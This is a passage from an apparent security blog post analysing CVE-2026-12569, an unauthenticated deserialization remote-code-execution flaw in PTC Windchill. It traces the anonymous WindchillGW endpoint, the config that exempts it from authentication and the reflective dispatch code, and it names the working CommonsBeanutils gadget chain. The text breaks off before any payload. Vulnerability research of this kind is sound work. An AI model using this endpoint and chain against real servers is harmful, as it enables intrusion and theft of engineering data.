<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill" />
<meta name="author" content="imjdl" />
<meta property="og:locale" content="en" />
<meta name="description" content="Background" />
<meta property="og:description" content="Background" />
<link rel="canonical" href="/posts/blog_cve_2026_12569_en/" />
<meta property="og:url" content="/posts/blog_cve_2026_12569_en/" />
<meta property="og:site_name" content="imjdl blog" />
<meta property="og:image" content="/assets/img/20260708/logo.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-07-08T12:34:00+08:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/img/20260708/logo.png" />
<meta property="twitter:title" content="CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill" />
<meta name="twitter:site" content="@Mortyjin" />
<meta name="twitter:creator" content="@MortyJin" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"imjdl","url":"https://github.com/imjdl/"},"dateModified":"2026-07-08T12:34:00+08:00","datePublished":"2026-07-08T12:34:00+08:00","description":"Background","headline":"CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill","image":"/assets/img/20260708/logo.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/blog_cve_2026_12569_en/"},"url":"/posts/blog_cve_2026_12569_en/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill | imjdl blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="imjdl blog">
<meta name="application-name" content="imjdl blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js,npm/mermaid@11.4.0/dist/mermaid.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script async src="/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/log.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">imjdl blog</a>
    <p class="site-subtitle fst-italic mb-0">Perpetual student, continual incremental improvement.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/reading-list/" class="nav-link">
            <i class="fa-fw fa fa-list-alt"></i>
            

            <span>READING LIST</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/imjdl"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Mortyjin"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['imelloit','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783485240"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jul  8, 2026
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/20260708/logo.png" class="popup img-link preview-img shimmer"><img src="/assets/img/20260708/logo.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/imjdl/">imjdl</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2796 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="background"><span class="me-2">Background</span><a href="#background" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>First, a word on the product. PTC Windchill is a product lifecycle management (PLM) system used in manufacturing and heavy industry, managing the full data chain from design through engineering to production — CAD drawings, bills of materials (BOM), change records, and parts documentation all live in it. Its customers are mostly aerospace, automotive, heavy-machinery, and defense contractors, where design drawings and engineering data are core intellectual property; once such a system is breached, what leaks is the company’s R&amp;D lifeblood. Windchill is large: Apache in front, Tomcat behind (PTC calls it the MethodServer), Oracle for business data, an LDAP directory for users, all running on JDK 1.8 (per this test environment). The broken piece this time is its WVS (Windchill Visualization Services) publishing module, which converts CAD models into lightweight viewable formats for the browser.</p>

<p>CVE-2026-12569 affects the WVS visualization publishing module of PTC Windchill PDMLink / FlexPLM. NVD assigns a CVSS v3.1 score of 9.8; the vulnerability is automatable, grants full control of the target on success, requires no authentication and no user interaction, and is triggered by network reachability alone. It is listed as exploited in the wild and was added to the CISA KEV catalog on 2026-06-25 — the first PTC product vulnerability to enter KEV. Affected versions cover 11.0 M030, 11.1 M020, 11.2.1, 12.0.2, 12.1.2, 13.0.2, and 13.1.1.</p>

<p><a href="/assets/img/20260708/001.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/001.png" alt="" loading="lazy"></a></p>

<p>This is the second deserialization compromise of PTC Windchill within 90 days. The predecessor CVE-2026-4681 (CVSS 10.0) was disclosed in March 2026; after its patch closed one path, attackers migrated to the <code class="language-plaintext highlighter-rouge">Publish</code> entry point to continue exploitation.</p>

<p>The environment used for this study (all authorized):</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Item</th>
      <th>Content</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Analysis target</td>
      <td>Windchill 11.0 M030</td>
    </tr>
    <tr>
      <td>Runtime</td>
      <td>JDK 1.8.0_60</td>
    </tr>
    <tr>
      <td>Running instance</td>
      <td>MethodServer</td>
    </tr>
    <tr>
      <td>Tools</td>
      <td>CFR &amp; IDEA &amp; VS Code &amp; Claude</td>
    </tr>
  </tbody>
</table></div>

<h2 id="summary"><span class="me-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><strong>Vulnerability Type:</strong> The anonymous reflective RPC gateway <code class="language-plaintext highlighter-rouge">WindchillGW</code> hands the attacker’s POST body to <code class="language-plaintext highlighter-rouge">com.ptc.wvs.server.publish.Publish.doPublishRep</code>, which treats the multipart form’s <code class="language-plaintext highlighter-rouge">config_spec</code> field as a base64-encoded Java serialized object and feeds it to <code class="language-plaintext highlighter-rouge">wt.util.Encoder.decode()</code> → <code class="language-plaintext highlighter-rouge">ObjectInputStream.readObject()</code>, with no class whitelist / no <code class="language-plaintext highlighter-rouge">ObjectInputFilter</code> (CWE-502 + CWE-20)</li>
  <li><strong>Exploitation:</strong> No authentication required; a single HTTP POST request triggers it; the target process executes commands with MethodServer privileges</li>
  <li><strong>Impact:</strong> Unauthenticated remote code execution; testing confirmed webshell deployment with <code class="language-plaintext highlighter-rouge">pdm11\administrator</code> privileges</li>
  <li><strong>Prerequisites:</strong> Network reachability only — no credentials, no user interaction</li>
  <li><strong>Gadget Chain:</strong> commons-collections 3.2.2 has built-in functors protection that disables the entire CC family; commons-beanutils 1.8.3’s <code class="language-plaintext highlighter-rouge">BeanComparator</code> has no protection but its SUID does not match ysoserial’s default (1.9.x); the final successful chain regenerates <code class="language-plaintext highlighter-rouge">CommonsBeanutils1</code> with the 1.8.3 jar</li>
</ul>

<h2 id="attack-entry"><span class="me-2">Attack Entry</span><a href="#attack-entry" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The vulnerability spans several layers from entry to sink; we peel them back following the request path. The first layer is the entry URL, and the source of the “unauthenticated” nature:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>POST /Windchill/servlet/WindchillGW/com.ptc.wvs.server.publish.Publish/doPublishRep
Content-Type: multipart/form-data; boundary=&lt;any boundary&gt;
</pre></td></tr></tbody></table></code></div></div>

<p>Windchill deploys two symmetric gateway Servlets with sharply different authentication policies:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">WindchillGW</code> → <code class="language-plaintext highlighter-rouge">wt.httpgw.HTTPGatewayServlet</code> (anonymous)</li>
  <li><code class="language-plaintext highlighter-rouge">WindchillAuthGW</code> → <code class="language-plaintext highlighter-rouge">wt.httpgw.HTTPAuthGatewayServlet</code> (requires Basic auth)</li>
</ul>

<p>The Apache config <code class="language-plaintext highlighter-rouge">30-app-Windchill-Auth.conf:86</code> explicitly exempts <code class="language-plaintext highlighter-rouge">WindchillGW</code> from authentication:</p>

<div class="language-apache highlighter-rouge"><div class="code-header">
        <span data-label-text="Apache"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="p">&lt;</span><span class="nl">LocationMatch</span><span class="sr"> ^/+Windchill/+servlet/+WindchillGW(;.*)?</span><span class="p">&gt;
</span>    <span class="nc">Require</span> <span class="ss">all</span> granted
<span class="p">&lt;/</span><span class="nl">LocationMatch</span><span class="p">&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">app-Windchill-AuthRes.xml</code> also marks it anonymous:</p>

<div class="language-xml highlighter-rouge"><div class="code-header">
        <span data-label-text="XML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;resource</span> <span class="na">type=</span><span class="s">"anonymous"</span><span class="nt">&gt;</span>servlet/WindchillGW<span class="nt">&lt;/resource&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/20260708/002.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/002.png" alt="" loading="lazy"></a></p>

<p>Measured comparison on the same machine:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Path</th>
      <th>Status code</th>
      <th>Meaning</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">/Windchill/servlet/WindchillGW/...</code></td>
      <td>200 / 302 / 500 (not 401)</td>
      <td>Anonymous passthrough</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">/Windchill/servlet/WindchillAuthGW/...</code></td>
      <td>401 + <code class="language-plaintext highlighter-rouge">WWW-Authenticate: Basic</code></td>
      <td>Protected by Basic auth</td>
    </tr>
  </tbody>
</table></div>

<p><a href="/assets/img/20260708/003.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/003.png" alt="" loading="lazy"></a></p>

<p>The vulnerability can only be reached via <code class="language-plaintext highlighter-rouge">WindchillGW</code>. The two gateways are symmetric at the transport layer; the authentication difference lies entirely in the Apache config. The business class <code class="language-plaintext highlighter-rouge">Publish.doPublishRep</code> enforces no authentication at the method itself, and the reflective call does not check either; its signature satisfies the reflective dispatch requirements of both gateways. Access control is placed at the transport layer rather than the application layer — a classic misplaced boundary.</p>

<h2 id="reflective-rpc-dispatch"><span class="me-2">Reflective RPC Dispatch</span><a href="#reflective-rpc-dispatch" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The request passes Apache’s anonymous passthrough and reaches the backend. The call chain inside the backend:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>HTTPGatewayServlet.service()
  → MethodRequestHandler.handleRequest()
    → HTTPServer.processRequest(req, resp)
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">HTTPServer.processRequest</code> (<code class="language-plaintext highlighter-rouge">HTTPServer.java:93-162</code>) is, in essence, a generic reflective RPC:</p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="c1">// path_info = "/com.ptc.wvs.server.publish.Publish/doPublishRep"</span>
<span class="nc">StringTokenizer</span> <span class="n">st</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringTokenizer</span><span class="o">(</span><span class="n">path_info</span><span class="o">,</span> <span class="s">"/"</span><span class="o">);</span>
<span class="nc">String</span> <span class="n">className</span>  <span class="o">=</span> <span class="n">st</span><span class="o">.</span><span class="na">nextToken</span><span class="o">();</span>   <span class="c1">// com.ptc.wvs.server.publish.Publish</span>
<span class="nc">String</span> <span class="n">methodName</span> <span class="o">=</span> <span class="n">st</span><span class="o">.</span><span class="na">nextToken</span><span class="o">();</span>   <span class="c1">// doPublishRep</span>

<span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">clazz</span> <span class="o">=</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="n">className</span><span class="o">);</span>

<span class="k">if</span> <span class="o">(</span><span class="n">hTTPRequest</span><span class="o">.</span><span class="na">isPostRequest</span><span class="o">())</span> <span class="o">{</span>
    <span class="c1">// POST prefers the 3-argument overload</span>
    <span class="nc">Class</span><span class="o">[]</span> <span class="n">sig</span> <span class="o">=</span> <span class="o">{</span><span class="nc">HTTPRequest</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="nc">HTTPResponse</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="nc">InputStream</span><span class="o">.</span><span class="na">class</span><span class="o">};</span>
    <span class="nc">Object</span><span class="o">[]</span> <span class="n">args</span> <span class="o">=</span> <span class="o">{</span><span class="n">req</span><span class="o">,</span> <span class="n">resp</span><span class="o">,</span> <span class="n">req</span><span class="o">.</span><span class="na">inputStream</span><span class="o">};</span>
    <span class="nc">Method</span> <span class="n">m</span> <span class="o">=</span> <span class="n">clazz</span><span class="o">.</span><span class="na">getMethod</span><span class="o">(</span><span class="n">methodName</span><span class="o">,</span> <span class="n">sig</span><span class="o">);</span>
    <span class="n">m</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="kc">null</span><span class="o">,</span> <span class="n">args</span><span class="o">);</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>This reflective call checks no authentication, no <code class="language-plaintext highlighter-rouge">RemoteAccess</code> annotation, and no target-class whitelist. Any class with a <code class="language-plaintext highlighter-rouge">public static methodName(HTTPRequest, HTTPResponse, InputStream)</code> method can be invoked anonymously. For POST requests, it passes the raw <code class="language-plaintext highlighter-rouge">InputStream</code> (the request body) directly as the third argument to the target method — giving the attacker full control over the byte stream reaching <code class="language-plaintext highlighter-rouge">doPublishRep</code>.</p>

<p>Verification is simple — GET a non-existent class:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>GET /Windchill/servlet/WindchillGW/foo.bar.NonExistent/fakeMethod
→ 500 + java.lang.ClassNotFoundException: foo.bar.NonExistent
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/20260708/004.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/004.png" alt="" loading="lazy"></a></p>

<p>The request reached <code class="language-plaintext highlighter-rouge">Class.forName</code> without authentication; the reflective dispatch path is connected.</p>

<h2 id="deserialization-sink"><span class="me-2">Deserialization Sink</span><a href="#deserialization-sink" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The reflective call ultimately lands on <code class="language-plaintext highlighter-rouge">Publish.doPublishRep</code>, at <code class="language-plaintext highlighter-rouge">Publish.java:1641</code>, which parses the multipart form with <code class="language-plaintext highlighter-rouge">MPInputStream</code>, reading field by field:</p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="nc">MPInputStream</span> <span class="n">mp</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">MPInputStream</span><span class="o">(</span><span class="n">inputStream</span><span class="o">,</span>
        <span class="n">hTTPRequest</span><span class="o">.</span><span class="na">getProperty</span><span class="o">(</span><span class="s">"cgi.multipart_boundary"</span><span class="o">));</span>

<span class="k">if</span> <span class="o">(</span><span class="n">name</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="no">CONFIG_SPEC</span><span class="o">))</span>      <span class="n">string10</span> <span class="o">=</span> <span class="n">readString</span><span class="o">().</span><span class="na">trim</span><span class="o">();</span>   <span class="c1">// 1680</span>
<span class="k">if</span> <span class="o">(</span><span class="n">name</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="no">DATA_SOURCE_TYPE</span><span class="o">))</span> <span class="o">...</span>
<span class="k">if</span> <span class="o">(</span><span class="n">name</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="no">OBJ_REF</span><span class="o">))</span>          <span class="o">...</span>

<span class="c1">// when dataSourceType == "1", enter the ConfigSpec branch</span>
